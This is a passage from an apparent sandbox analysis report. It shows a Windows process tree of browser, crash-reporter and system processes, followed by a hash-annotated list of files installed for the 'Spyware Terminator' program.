                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1992,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=2500 /prefetch:8
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3168 /prefetch:1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5716
                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3300 /prefetch:1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:3240
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4468,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4576 /prefetch:8
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:2272
                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4868 /prefetch:8
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:2212
                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4408,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4560 /prefetch:8
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:636
                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2068,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3372 /prefetch:2
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:3480
                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2420,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3392 /prefetch:2
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:5936
                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4040,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3476
                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3856,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3416 /prefetch:2
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5988
                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3880,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=5128 /prefetch:1
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:5348
                                                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:5980
                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\crashreporter.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\minidumps\c52e8324-17a4-44ce-9e13-a34a690903b3.dmp"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:2368
                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\minidumps\c52e8324-17a4-44ce-9e13-a34a690903b3.dmp"
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:4668
                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:520
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2344 -ip 2344
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:756
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:2336
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\dwm.exe
                                                                                                                                                                                                                                                                                                                                "dwm.exe"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\notepad.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:4420

                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Driver\stflt.cat

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    9KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    1a36ceb2dbf501cc99b1fe8779951b39

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    69a210135cd77067d7d44a4a7d3c29a732ad1ca1

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    4afda8aae7c511d9b7a037d82c94cee6b724a308cc6bd2ef1b1a75b5f0aec8df

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    a06aedba510aaa01c87b183b34d2d3680c8cb06acacb359611240e82e413b9f08422b7584b2be1d49ecaa79788db987bc7370becbb5d2408ff6be3c2246d8540

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Driver\stflt.inf

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    03ff8d629a1f61166e8c66617d886c02

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    3033cea68ca8834cecdc8f9104fe5ec087528227

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    513a031fd758365167d4327152dc80c6cb63bf763ffcc7e162ef26944443f5d2

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    5c6cced543c17782f7b1c76dcdffc74d9159fb6c77218aeef71780a86e09db054b1744e90ebf51e87565a55f9b20c0e9196773ed408024b6362bd18f322087a8

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Driver\stflt.sys

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    50KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    b9657a0aff28c1cb114acc0cb93ee4bb

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    35b22f9023755536a423844f47fd80421d4c90e1

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    619de6438827a648566cb6f6407df30e3bbce345775b0154d883a48e244a62ee

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    b3cd93a333d5ce0d4f4f13e853c74e94c43ce86b733abd5b285479ab06fad1505bce3b55a63c4432c3dbf1cd1af83e6722398b6d51af4b6ce0a4ba5f2d2d7dcb

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\STInternetGuard.dll

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    1d65dc1551573b40f6397c73ce5c7f9b

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    3100699480372f60dcebc14fbf240991d4f25ab7

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    87cda8e7dfaf460003ee9f1933e4d0add28a6647d5d02925ca71a0a60c95bdc4

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    b028312765424e66531f26e359b17edafd9606e37bc934a8712f8d381aa010ef940e20554b864768e68821d95917cb0622ced0375b194bb857d059d3975cc3c3

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    8fc791f066f459bc5f1397c7a2cd5f5d

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    ab4c8c3d35d4844b870b346519d997b6d18c9412

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    6768dd32576154dcc7b990132179e802fd0778dee9e2af82f891ef4103e042cd

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    efb24cfa09e6e4f67844c642176e1bd8cc5b5dc5ac086366a3e95a218f26d1c978a0105a69b1664b48137b6e025bf0e47f742336e89e02fdf3da03dc6524c293

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    b0eb392df2f774e067048346fcdb8622

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    0476253aab53543f7f4385d9f2b0b51d40993973

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    206b751870d3e2c164390b5c1980b4ae08f0677bfc52902bf329641a731c285d

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    d99fc0a403156995729530231784acfcda7a28967250e9bdb63a3c4bb52c415831fff053c60143fb523f3a52b4e079c712064fb931d395a2ccfd82b446e4fd81

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\STShell.dll

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    918KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    cc67bdf613d0d482acc73bdd10d56f13

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    092f09d7e898030c3d239289a1eb52fcfaf0977c

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    b0201e248b64beb3b8f3ee1fb2764594b833cb2ba77ba51c9832961f46184c48

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    5c3d355d52cffb2834da3e099cba082c7d1441d8367fff50b82666f714ba725b2c79d460f0db327afa541408140826b19cf5ca4713809b06533d4967e9795a4e

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\STShell64.dll

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    c9fbb8c492309556c74094bd2f6deeb2

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    cf83fdc0e20d66111edd6daa9934d37d2bbcf602

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    25a2ce9a86777cd9a5a5bb4a95c4f4a691573868d22a176a61cac3ee7411b6c0

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    129aebabb0ed29944fa0952d93f2f116972558ddb58871a7dcf27e8a843cb3fc55bc64bfc00accca7e66051e86f2bc6b8b8677fa64a3512be7a37b19b44fa472

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\ST_DB.spt

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    839e014e7bf8343944afa1f0b9c41e96

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    38e8e0cae71f160da152587556528fcaba333aa3

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    885ccd48f11c916f1e80807fb52d4f34a4f639dba330fb71fe163a6f72abef08

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    305cb9ebba6faa3b404bf75bfcd849977170488d78ac0f1f913ba21ee53f9024fedd7b367b82426daf2d249d816c07a827129f535435428729280cf10e4d0ab4

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    6.7MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    5fba563818f67341904a43da705f16d0

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    ec625cad222338fd7f0c8cf1399ba59c45d78f89

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    613f4b7d73093ef622741753ffe30b2c09d47d6490e197aebd2655827337adf3

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    1fbac427adf6d5eb42d68ad048dd6c8661c08469d006e76ceb28328564989f137a758a2b5ff2105f108e4b14127a6d368570d0bebda5a62a41b620ab18e53889

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    5.1MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    e9150f50ccb4f8eb44f5b0e1cabae3c7

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    26977a765e04d7eef27309ce00554a319a6a657b

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    b14379b3a070486f6b5c004a94749c973fe2eacdd7abbfe3685e3a8701a1fe5f

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    e44804d4d03574a3496fbc2936b4af21e4ee86a4de9c5cbc7dc4444b0f007b3e48bbfe52964de974dca54f28ad01538d99e67afdf2ccd986ff5cb2801cff9c09

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    5.3MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    e762d8cc075ffbfe211f92f34ea8f153

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    8d3165f8fdc293f5c4b149d0bd5ca6252e334412

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    389f1f1a40070ad4bac245d8aa3270930e4f04b9ce42d7fb0bbe08b9d6136cf7

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    5a41100ef75d48392b6d29c677252976a092bdb0c9108719496204317cdb8f7d2bd3f2c6ff645c299bb4d90a3ec06a6e4f62240798a3a31aadeac28909433bbf

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\24x7.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    0744e79cd32e08351609d09b3af017fe

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    d4a7c1689f54dfc5492d78cc4cba3f2faa40f719

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    1c660a8c1e40137aa41df4cd2bb465a43ed8f5ed2f59f4983bdf4c9db5e634f4

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    2d097498249dc77211e05756cd4f6bf205ee8f4aef1798726f3861201fddaa17fd56cd5458c1af6f844327fe3f981dd644d9f57d8087218b442a7ad83661607b

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\analyze.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    10KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    7de1d4be2712041bfdb1cd580ccf3ac9

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    960932bc1feb416bde6634d0099a2c971454e07b

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    344c5ae0850008022732488cc12be17ae6f1119b47d59da7490e95da574722ec

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    d5bfae821402a63ec05e5b11930b2090ba4db1cad453f928fd1851adb1074b9fd713a8f62690ca86b5c80e2bce9191c159513ac6347bebac007bf9de3f5d90e3

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    2.5MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    2cf1ac7e62fb2b559b148f8b2930494b

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    1f7129fdb287b0ebd40ce0d460eba91c054853c8

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    91e5fe18b3543d6e1392615176eda651c24cad18f503786cfa230fc4c748e61c

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    af3eb496a4cf3f6669acced5d05f78e36d63c29610956e4c8d3a73dd9f69faef1afef838e77c1317529b5e8656b9ffda2642fc28dc243f38edb253900ed97f69

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\bloatware.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    10KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    726efd2d81d2444dfef02d3125ff11cf

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    d0b4078551b98c63e3932bb78f3ec00b6e9764b9

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    abeab2ab4e92b793bedf505785d7a7b31c6ec466b6a5fd18f5f24da0b7c81fb2

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    18ba940f019b43af5100204ba718720d663aaaa3d9303304770aee09f458a493bfeb4179a4820a7563994e81347b7af1191a46ba2ec31d302b578b0330b9d653

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\defsyssettings.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    2.8MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    f3fc6cb63b4a11f551b91f125002519b

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    5d227d69844f04a4e775e266ffa9ceccd6254f8a

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    f289737c3b5ac89c00b57124ca803d8115b431d3a52bd8bf2e51a0c59bcb420a

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    df93402bc18c1d61e33fcec0832a8099ac5b3cae8ee11672dab447e42fe22b210d74e0baa555570bfb7d6946be4b7d05a0c00bd052ae1c11239fb159426b8b72

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\hardfileremover.exe

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    2.4MB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    78fbbdd72955595e17d5da0f2e05e866

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    26f38362fc2a8dc00bb4999be4dc00347b424df3

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    2a52f3e4469252f2a0284837302593694e2b5a4e9d9acd4e351a5188e5b1f403

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    6a6f64c3e6a29ff5dd5454dcedd5605de7e58cf29de5bfa26bf80da474d4a3d3110e91c7248ec51ae5adaad331d3baad66f9bcc4af717d28545f966d971f30b2

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\optimizer.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    a4d1d3eb0935b42a9f5103e364672475

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    ca61c70ef1abb33ee649801c2931ddffae0237ae

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    64f04b0c30477281ba0d417c53b99745683ff8fcc768dbbfc52ebfff70c46952

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    7b4291a4bbee8e8cf91f62f976eb521b639d967299779269e2993f35069b9ae31f70afc3d0653753dc4cd4d71ae23b888a0de137b455f02fcb1d812193bf3c88

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\ov.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    a2b00b06feacfa801b77560f429c1207

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    0c370d1c0a1f1f24c0a8b7efd41fb5970fb9caf4

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    b2dfaaf6fb96100d88cf020b50cb65a15a3eeb7c355004bea89d031dc25f2eae

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    48d158fd10804ee1f4f82f979aaab48664fcb329ddc88e71e01af6739e1f598ae4f8e8069b9250f81eaff59bf3fd14f78411f74c8cc47a2cfbbc4db6c79c18ac

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\remover.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    9KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    ccc3a298e43a1195fe424263997a37c7

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    e419703fd71b849c0a07350e4a85443bfc6ea5fa

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    59f9cb31313f7b3871ca1ec49a85ac08298ed2c632c583224e2e6d0fb62249e2

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    1fb55b49cf47a2a648dcd2dc4dc93684718969b6d8002c0bf2417f2fbb39fcda6aad98dd10f2e7934699d1459b028f0de2eb83581ce65201b7f0c0d4ac2e4cc5

                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Spyware Terminator\Tools\restore.xml

                                                                                                                                                                                                                                                                                                                                    Filesize

